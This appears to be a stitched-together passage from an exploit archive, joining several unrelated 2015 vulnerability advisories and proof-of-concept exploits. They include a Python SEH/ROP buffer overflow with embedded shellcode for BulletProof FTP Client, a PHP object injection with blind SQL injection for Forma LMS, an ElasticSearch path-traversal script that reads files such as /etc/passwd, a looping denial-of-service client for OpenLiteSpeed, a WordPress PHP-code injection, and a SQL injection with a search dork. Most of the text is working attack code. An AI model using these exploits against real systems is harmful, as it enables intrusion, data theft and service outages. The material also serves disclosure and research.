<img class="album-thumb" alt="" src="/api/group/poster/2" height="90" width="90"></a>
<div class="album-folder-img"><img alt="" src="/cvab.png" height="160" width="140"></div>
</div>
PoC: #2 Topic Album (Album Title - album_info_intro_driver)
<div class="top-section">
<div id="intro">
<div class="divider">
<h1 class="strong" id="album_info_intro_driver">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a>(0-2)</a></h1><a>
<div class="pagination"></div>
</a></div><a>
</a></div><a>
</a><div class="centered"><a>
</a><a class="button-2 ui-glossy rad-l" href="javascript:location.reload(true)">Refresh</a>
<a class="button-2 ui-glossy rad-r" href="javascript:downloadAllSelection()">Download ZIP</a>
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:80/upload.html
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/groups]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------8397114799830
Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:80/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[210]
Connection[keep-alive]
Date[Sat, 09 May 2015 15:21:30 GMT]
Reference(s):
http://localhost:80/groups
http://localhost:80/upload.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync.
Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output
values in the mobile wifi interface (file dir) application.
Security Risk:
==============
The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#
#!/usr/bin/python
from struct import pack
# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll]
buf += b'A' * 18
buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll]
buf += b'A' * 8
buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll]
buf += b'A' * 10
buf += b'\xce\xc3\x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]
# ROP chain
rop_gadgets = b''
rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501
rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll]
rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll]
rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll]
rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll]
rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll]
rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll]
# heap-only egghunter
hunter = b'\x6a\x30\x5a' # PUSH 30 # POP EDX
hunter += b'\x64\x8b\x12' # MOV EDX, DWORD PTR FS:[EDX]
hunter += b'\x80\xc2\x90' # ADD DL,90
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\xeb\x05' # JMP SHORT
hunter += b'\x66\x81\xca\xff\x0f' # OR DX,0FFF
hunter += b'\x42\x52' # INC EDX # PUSH EDX
hunter += b'\x6a\x02\x58' # PUSH 2 # POP EAX
hunter += b'\xcd\x2e' # INT 2E
hunter += b'\x3c\x05' # CMP AL,5
hunter += b'\x5a' # POP EDX
hunter += b'\x74\xef' # JE SHORT
hunter += b'\xb8\x77\x30\x30\x74' # MOV EAX, w00t
hunter += b'\x89\xd7' # MOV EDI,EDX
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xea' # JNZ SHORT
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xe7' # JNZ SHORT
# copy shellcode back to stack
strcpy = b'\x8b\xec' # MOV EBP,ESP
strcpy += b'\x57\x55\x55' # PUSH EDI # PUSH EBP # PUSH EBP
strcpy += b'\x68\x30\x60\xc4\x77' # PUSH ptr to &strcpy [msvcrt.dll]
strcpy += b'\xc3' # RET
egg = 'w00t'.encode()
# msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe
shellcode = b''
shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31'
shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70'
shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8'
shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91'
shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1'
shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37'
shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e'
shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc'
shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8'
shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73'
shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3'
shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61'
shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b'
shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88'
shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17'
shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4'
shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66'
identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'
host = buf
port = b'21'
name = b'B' + rop_gadgets + hunter + strcpy
password = b'bpfmcidchffddknejf'
local = egg + egg + shellcode
sploit = b"\r\n".join([identifier, host, port, name, password, local])
try:
print('[*] Creating exploit file...')
f = open('sploit.bps', 'wb')
f.write(sploit)
f.close()
print('[*] sploit.bps file successfully created!')
except:
print('[!] Error while creating exploit file!')
Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities
[+] Author: Filippo Roncari
[+] Target: Forma LMS
[+] Version: 1.3 and probably lower
[+] Vendor: http://www.formalms.org
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf
[+] Info: f.roncari@securenetwork.it / f@unsec.it
[+] Summary
Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.
[+] Vulnerability Details
Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities.
[+] Technical Details
See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details.
[+] Proof of Concept (PoC)
The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory.
[!] PoC Payload
----------------------------
a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";}
----------------------------
[!] PoC Request
----------------------------
POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1
Host: localhost
Cookie: docebo_session=91853e7eca413578de70304f94a43fe1
Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796
Content-Length: 1453
[...]
-----------------------------1657367614367103261183989796
Content-Disposition: form-data; name="message[recipients]"
a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+ char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst% 3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D
[...]
--------------------------
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/
import socket, sys
print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]
def grab(plugin):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
"Host: %s\n\n" % (plugin, fpath, host))
file = s.recv(2048)
print " [*] Trying to retrieve %s:" % fpath
if ("HTTP/1.0 200 OK" in file):
print "\n%s" % file
else:
print "[-] File Not Found, No Access Rights or System Not Vulnerable"
def pfind(plugin):
try:
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/ HTTP/1.0\n"
"Host: %s\n\n" % (plugin, host))
file = s.recv(16)
print "[*] Trying to find plugin %s:" % plugin
if ("HTTP/1.0 200 OK" in file):
print "[+] Plugin found!"
grab(plugin)
sys.exit()
else:
print "[-] Not Found "
except Exception, e:
print "[-] Error connecting to %s: %s" % (host, e)
sys.exit()
# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
for plugin in pluginList:
pfind(plugin)
// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
#include <sys/io.h>
#define FIFO 0x3f5
int main() {
int i;
iopl(3);
outb(0x0a,0x3f5); /* READ ID */
for (i=0;i<10000000;i++)
outb(0x42,0x3f5); /* push */
}
// Source: http://www.binvul.com/viewthread.php?tid=508
// Source: https://twitter.com/NTarakanov/status/598370525132423168
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")
int main(int argc, CHAR* argv[]) {
typedef NTSTATUS (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions);
NT_OPEN_FILE NtOpenFileStruct;
PVOID Info;
HMODULE hModule = LoadLibrary(("ntdll.dll"));
NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile");
if(NtOpenFileStruct == NULL) {
exit(-1);
}
UNICODE_STRING filename;
RtlInitUnicodeString(&filename, L"\\Device\\CNG");
OBJECT_ATTRIBUTES obja;
obja.Attributes = 0x40;
obja.ObjectName = &filename;
obja.Length = 0x18;
obja.RootDirectory = NULL;
obja.SecurityDescriptor = NULL;
obja.SecurityQualityOfService = NULL;
IO_STATUS_BLOCK iostatusblock;
HANDLE hCNG = NULL;
NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
if(NT_SUCCESS(stat)) {
printf("File successfully opened.\n");
}
else {
printf("File could not be opened.\n");
return -1;
}
DWORD dwBuffer = 0;
DWORD dwCnt = 0;
BOOL bRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL);
if (FALSE == bRet)
{
printf("[*]Send IOCTL fail!\n");
printf("[*]Error Code:%d\n", GetLastError());
}
else
{
printf("[*]0x%08x\n", dwBuffer);
}
CloseHandle(hCNG);
getchar();
return 0;
}
/*
* Openlitespeed 1.3.9 Use After Free denial of service exploit.
*
* This exploit triggers a denial of service condition within the Openlitespeed web
* server. This is achieved by sending a tampered request contain a large number (91)
* of 'a: a' header rows. By looping this request, a memmove call within the HttpReq
* class is triggered with a freed pointer, resulting in a reference to an invalid
* memory location and thus a segmentation fault.
*
* UAF Request:
* GET / HTTP/1.0
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
*
* The above request should be placed into a file name 'uafcrash' prior to running this
* exploit code.
*
* Date: 24/03/2015
* Author: Denis Andzakovic - Security-Assessment.com
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
extern int errno;
int main(int argc, char ** argv){
FILE * fp;
size_t len = 0;
char * line;
if((fp = fopen("uafcrash", "r")) == NULL){
fprintf(stderr, "[!] Error: Could not open file uafcrash: %s", strerror(errno));
return 1;
}
char * host = "127.0.0.1";
int port = 8088;
int count = 0;
int sock;
struct sockaddr_in serv_addr;
while(1){
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
fprintf(stderr, "[!] Error: Could not create socket \n");
return 1;
}
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(port);
inet_pton(AF_INET, host, &serv_addr.sin_addr);
if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){
fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count);
close(sock);
return 1;
}
while ((getline(&line, &len, fp)) != -1){
write(sock, line, strlen(line));
}
close(sock);
rewind(fp);
count++;
}
return 42;
}
# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps
1. Description
Remote Code Execution via email field.
2. Proof of Concept
POST Request
sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=
When the admin user checks the subscibers list, the php code is executed.
3. Solution
Fixed in version 1.2
# Exploit Title: Chronosite 5.12 SQL Injection
# Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site"
# Date: 13/05/15
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.chronosite.org/
# Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip
# Version: 5.12
# Tested on: Xampp on Windows7
################################################################
PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27
################################################################